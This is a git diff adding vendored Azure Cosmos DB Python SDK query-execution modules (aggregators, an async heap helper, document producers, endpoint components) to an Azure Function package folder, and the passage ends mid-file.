a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc new file mode 100644 index 0000000..7b9c281 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc new file mode 100644 index 0000000..0cbef92 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc new file mode 100644 index 0000000..0ffd06d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc new file mode 100644 index 0000000..7b7a3d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py new file mode 100644 index 0000000..5b1eef1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aggregators.py @@ -0,0 +1,115 @@ +# The MIT License (MIT) +# Copyright (c) 2017 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. 
+ +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for aggregation queries implementation in the Azure Cosmos +database service. +""" +from abc import abstractmethod, ABCMeta +from azure.cosmos._execution_context.document_producer import _OrderByHelper + + +class _Aggregator(object): + __metaclass__ = ABCMeta + + @abstractmethod + def aggregate(self, other): + pass + + @abstractmethod + def get_result(self): + pass + + +class _AverageAggregator(_Aggregator): + def __init__(self): + self.sum = None + self.count = None + + def aggregate(self, other): + if other is None or not "sum" in other: + return + if self.sum is None: + self.sum = 0.0 + self.count = 0 + self.sum += other["sum"] + self.count += other["count"] + + def get_result(self): + if self.sum is None or self.count is None or self.count <= 0: + return None + return self.sum / self.count + + +class _CountAggregator(_Aggregator): + def __init__(self): + self.count = 0 + + def aggregate(self, other): + self.count += other + + def get_result(self): + return self.count + + +class _MinAggregator(_Aggregator): + def __init__(self): + self.value = None + + def aggregate(self, other): + if self.value is None: + self.value = other + else: + if _OrderByHelper.compare({"item": other}, {"item": self.value}) < 0: + self.value = other + + def get_result(self): + return self.value + + +class _MaxAggregator(_Aggregator): + def __init__(self): + self.value = None + + def aggregate(self, other): + if self.value is None: + self.value = other + else: + if _OrderByHelper.compare({"item": other}, {"item": self.value}) > 0: + self.value = other + + def get_result(self): + return self.value + + +class _SumAggregator(_Aggregator): + def __init__(self): + self.sum = None + + def aggregate(self, other): + if other is None: + return + if self.sum is None: + self.sum = other + else: + self.sum += other + + def get_result(self): + return self.sum diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py new file mode 100644 index 0000000..a9253df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__init__.py @@ -0,0 +1,20 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. 
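The _Aggregator subclasses in aggregators.py above fold partial, per-partition results into a single final value; _AverageAggregator, for example, consumes {"sum": ..., "count": ...} payloads. A minimal usage sketch against the vendored module, with illustrative payload values rather than real service output:

from azure.cosmos._execution_context.aggregators import _AverageAggregator

agg = _AverageAggregator()
# Each dict stands in for one partition's partial AVG result (illustrative values).
for partial in ({"sum": 10.0, "count": 4}, {"sum": 6.0, "count": 2}):
    agg.aggregate(partial)
print(agg.get_result())  # (10.0 + 6.0) / (4 + 2) -> 2.666...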
+ +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e019d08 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc new file mode 100644 index 0000000..b63c898 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc new file mode 100644 index 0000000..b9624e9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc new file mode 100644 index 0000000..d7303c9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc new file mode 100644 index 0000000..2061164 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc new file mode 100644 index 0000000..81dc394 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc new file mode 100644 index 0000000..017576a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py new file mode 100644 index 0000000..3ee1865 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/_queue_async_helper.py @@ -0,0 +1,74 @@ +# The MIT License (MIT) +# Copyright (c) 2022 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
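The _queue_async_helper module whose body follows mirrors heapq's sift routines but awaits a comparator, so heap ordering can depend on asynchronous document producers. A minimal driver, assuming a trivial numeric comparator in place of the SDK's document-producer comparator:

import asyncio

from azure.cosmos._execution_context.aio import _queue_async_helper

class _NumberComparator:
    # Stand-in for the SDK comparator protocol: an awaitable compare(a, b)
    # returning a negative, zero, or positive integer.
    async def compare(self, a, b):
        return (a > b) - (a < b)

async def main():
    heap, comparator = [], _NumberComparator()
    for value in (5, 1, 4, 2, 3):
        await _queue_async_helper.heap_push(heap, value, comparator)
    print([await _queue_async_helper.heap_pop(heap, comparator) for _ in range(5)])
    # -> [1, 2, 3, 4, 5]

asyncio.run(main())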
+ +async def heap_push(heap, item, document_producer_comparator): + """Push item onto heap, maintaining the heap invariant.""" + heap.append(item) + await _sift_down(heap, document_producer_comparator, 0, len(heap) - 1) + + +async def heap_pop(heap, document_producer_comparator): + """Pop the smallest item off the heap, maintaining the heap invariant.""" + last_elt = heap.pop() # raises appropriate IndexError if heap is empty + if heap: + return_item = heap[0] + heap[0] = last_elt + await _sift_up(heap, document_producer_comparator, 0) + return return_item + return last_elt + + +async def _sift_down(heap, document_producer_comparator, start_pos, pos): + new_item = heap[pos] + # Follow the path to the root, moving parents down until finding a place + # new_item fits. + while pos > start_pos: + parent_pos = (pos - 1) >> 1 + parent = heap[parent_pos] + if await document_producer_comparator.compare(new_item, parent) < 0: + # if new_item < parent: + heap[pos] = parent + pos = parent_pos + continue + break + heap[pos] = new_item + + +async def _sift_up(heap, document_producer_comparator, pos): + end_pos = len(heap) + start_pos = pos + new_item = heap[pos] + # Bubble up the smaller child until hitting a leaf. + child_pos = 2 * pos + 1 # leftmost child position + while child_pos < end_pos: + # Set child_pos to index of smaller child. + right_pos = child_pos + 1 + # if right_pos < end_pos and not heap[child_pos] < heap[right_pos]: + if right_pos < end_pos and not await document_producer_comparator.compare(heap[child_pos], heap[right_pos]) < 0: + child_pos = right_pos + # Move the smaller child up. + heap[pos] = heap[child_pos] + pos = child_pos + child_pos = 2 * pos + 1 + # The leaf at pos is empty now. Put new_item there, and bubble it up + # to its final resting place (by sifting its parents down). + heap[pos] = new_item + await _sift_down(heap, document_producer_comparator, start_pos, pos) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py new file mode 100644 index 0000000..de2876d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/base_execution_context.py @@ -0,0 +1,170 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution context implementation in the Azure Cosmos +database service. +""" + +from collections import deque +import copy + +from ...aio import _retry_utility_async +from ... import http_constants + +# pylint: disable=protected-access + + +class _QueryExecutionContextBase(object): + """ + This is the abstract base execution context class. + """ + + def __init__(self, client, options): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + """ + self._client = client + self._options = options + self._is_change_feed = "changeFeed" in options and options["changeFeed"] is True + self._continuation = self._get_initial_continuation() + self._has_started = False + self._has_finished = False + self._buffer = deque() + + def _get_initial_continuation(self): + if "continuation" in self._options: + if "enableCrossPartitionQuery" in self._options: + raise ValueError("continuation tokens are not supported for cross-partition queries.") + return self._options["continuation"] + return None + + def _has_more_pages(self): + return not self._has_started or self._continuation + + async def fetch_next_block(self): + """Returns a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + if not self._has_more_pages(): + return [] + + if self._buffer: + # if there is anything in the buffer returns that + res = list(self._buffer) + self._buffer.clear() + return res + + # fetches the next block + return await self._fetch_next_block() + + async def _fetch_next_block(self): + raise NotImplementedError + + async def __aiter__(self): + """Returns itself as an iterator""" + return self + + async def __anext__(self): + """Return the next query result. + + :return: The next query result. + :rtype: dict + :raises StopAsyncIteration: If no more result is left. + """ + if self._has_finished: + raise StopAsyncIteration + + if not self._buffer: + + results = await self.fetch_next_block() + self._buffer.extend(results) + + if not self._buffer: + raise StopAsyncIteration + + return self._buffer.popleft() + + async def _fetch_items_helper_no_retries(self, fetch_function): + """Fetches more items and doesn't retry on failure + + :return: List of fetched items. + :rtype: list + """ + fetched_items = [] + # Continues pages till finds a non empty page or all results are exhausted + while self._continuation or not self._has_started: + if not self._has_started: + self._has_started = True + new_options = copy.deepcopy(self._options) + new_options["continuation"] = self._continuation + + (fetched_items, response_headers) = await fetch_function(new_options) + continuation_key = http_constants.HttpHeaders.Continuation + # Use Etag as continuation token for change feed queries. + if self._is_change_feed: + continuation_key = http_constants.HttpHeaders.ETag + # In change feed queries, the continuation token is always populated. The hasNext() test is whether + # there is any items in the response or not. 
+ if not self._is_change_feed or fetched_items: + self._continuation = response_headers.get(continuation_key) + else: + self._continuation = None + if fetched_items: + break + return fetched_items + + async def _fetch_items_helper_with_retries(self, fetch_function): + async def callback(): + return await self._fetch_items_helper_no_retries(fetch_function) + + return await _retry_utility_async.ExecuteAsync(self._client, self._client._global_endpoint_manager, callback) + + +class _DefaultQueryExecutionContext(_QueryExecutionContextBase): + """ + This is the default execution context. + """ + + def __init__(self, client, options, fetch_function): + """ + :param CosmosClient client: + :param dict options: The request options for the request. + :param method fetch_function: + Will be invoked for retrieving each page + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + super(_DefaultQueryExecutionContext, self).__init__(client, options) + self._fetch_function = fetch_function + + async def _fetch_next_block(self): + while super(_DefaultQueryExecutionContext, self)._has_more_pages() and not self._buffer: + return await self._fetch_items_helper_with_retries(self._fetch_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py new file mode 100644 index 0000000..0229fda --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/document_producer.py @@ -0,0 +1,274 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for document producer implementation in the Azure Cosmos +database service. +""" + +import numbers +from collections import deque + +from azure.cosmos import _base +from azure.cosmos._execution_context.aio.base_execution_context import _DefaultQueryExecutionContext + + +class _DocumentProducer(object): + """This class takes care of handling of the results for one single partition + key range. + + When handling an orderby query, MultiExecutionContextAggregator instantiates + one instance of this class per target partition key range and aggregates the + result of each. 
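The _fetch_items_helper_no_retries loop above pages by echoing the server's continuation header back into the request options until it comes back empty. The same control flow as a standalone sketch, with a hypothetical in-memory fetch function standing in for the service call:

import asyncio

async def fetch_page(options):
    # Hypothetical two-page result set keyed by continuation token; the real
    # fetch function issues a request and returns (items, response_headers).
    pages = {None: ([1, 2], {"x-ms-continuation": "tok1"}), "tok1": ([3], {})}
    return pages[options["continuation"]]

async def drain():
    items_seen, continuation, has_started = [], None, False
    while continuation or not has_started:
        has_started = True
        items, headers = await fetch_page({"continuation": continuation})
        continuation = headers.get("x-ms-continuation")
        items_seen.extend(items)
    return items_seen

print(asyncio.run(drain()))  # [1, 2, 3]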
+ """ + + def __init__(self, partition_key_target_range, client, collection_link, query, document_producer_comp, options): + """ + Constructor + """ + self._options = options + self._partition_key_target_range = partition_key_target_range + self._doc_producer_comp = document_producer_comp + self._client = client + self._buffer = deque() + + self._is_finished = False + self._has_started = False + self._cur_item = None + # initiate execution context + + path = _base.GetPathFromLink(collection_link, "docs") + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return await self._client.QueryFeed(path, collection_id, query, options, partition_key_target_range["id"]) + + self._ex_context = _DefaultQueryExecutionContext(client, self._options, fetch_fn) + + async def __aiter__(self): + return self + + async def __anext__(self): + """ + :return: The next result item. + :rtype: dict + :raises StopIteration: If there is no more result. + + """ + if self._cur_item is not None: + res = self._cur_item + self._cur_item = None + return res + + return await self._ex_context.__anext__() + + def get_target_range(self): + """Returns the target partition key range. + :return: + Target partition key range. + :rtype: dict + """ + return self._partition_key_target_range + + async def peek(self): + """ + TODO: use more_itertools.peekable instead + :return: The current result item. + :rtype: dict. + :raises StopIteration: If there is no current item. + + """ + if self._cur_item is None: + self._cur_item = await self._ex_context.__anext__() + + return self._cur_item + + +def _compare_helper(a, b): + if a is None and b is None: + return 0 + return (a > b) - (a < b) + + +class _PartitionKeyRangeDocumentProducerComparator(object): + """ + Provides a Comparator for document producers using the min value of the + corresponding target partition. + """ + + def __init__(self): + pass + + async def compare(self, doc_producer1, doc_producer2): # pylint: disable=no-self-use + return _compare_helper( + doc_producer1.get_target_range()["minInclusive"], doc_producer2.get_target_range()["minInclusive"] + ) + + +class _OrderByHelper(object): + + @staticmethod + def getTypeOrd(orderby_item): + """Returns the ordinal of the value of the item pair in the dictionary. + + :param dict orderby_item: + + :return: + 0 if the item_pair doesn't have any 'item' key + 1 if the value is undefined + 2 if the value is a boolean + 4 if the value is a number + 5 if the value is a str or a unicode + :rtype: int + """ + if "item" not in orderby_item: + return 0 + val = orderby_item["item"] + if val is None: + return 1 + if isinstance(val, bool): + return 2 + if isinstance(val, numbers.Number): + return 4 + if isinstance(val, str): + return 5 + + raise TypeError("unknown type" + str(val)) + + @staticmethod + def getTypeStr(orderby_item): + """Returns the string representation of the type + + :param dict orderby_item: + :return: String representation of the type + :rtype: str + """ + if "item" not in orderby_item: + return "NoValue" + val = orderby_item["item"] + if val is None: + return "Null" + if isinstance(val, bool): + return "Boolean" + if isinstance(val, numbers.Number): + return "Number" + if isinstance(val, str): + return "String" + + raise TypeError("unknown type" + str(val)) + + @staticmethod + async def compare(orderby_item1, orderby_item2): + """Compare two orderby item pairs. + + :param dict orderby_item1: + :param dict orderby_item2: + :return: + Integer comparison result. 
+ The comparator acts such that + - if the types are different we get: + Undefined value < Null < booleans < Numbers < Strings + - if both arguments are of the same type: + it simply compares the values. + :rtype: int + """ + + type1_ord = _OrderByHelper.getTypeOrd(orderby_item1) + type2_ord = _OrderByHelper.getTypeOrd(orderby_item2) + + type_ord_diff = type1_ord - type2_ord + + if type_ord_diff: + return type_ord_diff + + # the same type, + if type1_ord == 0: + return 0 + + return _compare_helper(orderby_item1["item"], orderby_item2["item"]) + + +def _peek_order_by_items(peek_result): + return peek_result["orderByItems"] + + +class _OrderByDocumentProducerComparator(_PartitionKeyRangeDocumentProducerComparator): + """Provide a Comparator for document producers which respects orderby sort order. + """ + + def __init__(self, sort_order): # pylint: disable=super-init-not-called + """Instantiates this class + + :param list sort_order: + List of sort orders (i.e., Ascending, Descending) + + :ivar list sort_order: + List of sort orders (i.e., Ascending, Descending) + + """ + self._sort_order = sort_order + + async def compare(self, doc_producer1, doc_producer2): + """Compares the given two instances of DocumentProducers. + + Based on the orderby query items and whether the sort order is Ascending + or Descending compares the peek result of the two DocumentProducers. + + If the peek results are equal based on the sort order, this comparator + compares the target partition key range of the two DocumentProducers. + + :param _DocumentProducer doc_producer1: first instance + :param _DocumentProducer doc_producer2: first instance + :return: + Integer value of compare result. + positive integer if doc_producer1 > doc_producer2 + negative integer if doc_producer1 < doc_producer2 + :rtype: int + """ + + res1 = _peek_order_by_items(await doc_producer1.peek()) + res2 = _peek_order_by_items(await doc_producer2.peek()) + + self._validate_orderby_items(res1, res2) + + for i, (elt1, elt2) in enumerate(zip(res1, res2)): + res = await _OrderByHelper.compare(elt1, elt2) + if res != 0: + if self._sort_order[i] == "Ascending": + return res + if self._sort_order[i] == "Descending": + return -res + + return await _PartitionKeyRangeDocumentProducerComparator.compare(self, doc_producer1, doc_producer2) + + def _validate_orderby_items(self, res1, res2): + if len(res1) != len(res2): + # error + raise ValueError("orderByItems cannot have different size") + + if len(res1) != len(self._sort_order): + # error + raise ValueError("orderByItems cannot have a different size than sort orders.") + + for elt1, elt2 in zip(res1, res2): + type1 = _OrderByHelper.getTypeStr(elt1) + type2 = _OrderByHelper.getTypeStr(elt2) + if type1 != type2: + raise ValueError("Expected {}, but got {}.".format(type1, type2)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py new file mode 100644 index 0000000..0dc6c30 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_execution_context/aio/endpoint_component.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), 
to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for query execution endpoint component implementation in the +Azure Cosmos database service. +""" +import numbers +import copy +import hashlib +import json + +from azure.cosmos._execution_context.aggregators import ( + _AverageAggregator, + _CountAggregator, + _MaxAggregator, + _MinAggregator, + _SumAggregator, +) + + +class _QueryExecutionEndpointComponent(object): + def __init__(self, execution_context): + self._execution_context = execution_context + + async def __aiter__(self): + return self + + async def __anext__(self): + # supports python 3 iterator + return await self._execution_context.__anext__() + + +class _QueryExecutionOrderByEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling an order by query. + + For each processed orderby result it returns 'payload' item of the result. + """ + async def __anext__(self): + payload = await self._execution_context.__anext__() + return payload["payload"] + + +class _QueryExecutionTopEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling top query. + + It only returns as many results as top arg specified. + """ + + def __init__(self, execution_context, top_count): + super(_QueryExecutionTopEndpointComponent, self).__init__(execution_context) + self._top_count = top_count + + async def __anext__(self): + if self._top_count > 0: + res = await self._execution_context.__anext__() + self._top_count -= 1 + return res + raise StopAsyncIteration + + +class _QueryExecutionDistinctOrderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. + """ + def __init__(self, execution_context): + super(_QueryExecutionDistinctOrderedEndpointComponent, self).__init__(execution_context) + self.last_result = None + + async def __anext__(self): + res = await self._execution_context.__anext__() + while self.last_result == res: + res = await self._execution_context.__anext__() + self.last_result = res + return res + + +class _QueryExecutionDistinctUnorderedEndpointComponent(_QueryExecutionEndpointComponent): + """Represents an endpoint in handling distinct query. + + It returns only those values not already returned. 
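The ordered DISTINCT component above can deduplicate with O(1) state only because an ORDER BY stream arrives sorted, so duplicates are always adjacent. The same skip-adjacent-duplicates loop as a standalone sketch:

import asyncio

async def distinct_ordered(agen):
    last = object()  # sentinel that never equals a real result
    async for res in agen:
        if res != last:
            last = res
            yield res

async def source():
    for value in (1, 1, 2, 2, 2, 3):
        yield value

async def main():
    print([v async for v in distinct_ordered(source())])  # [1, 2, 3]

asyncio.run(main())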
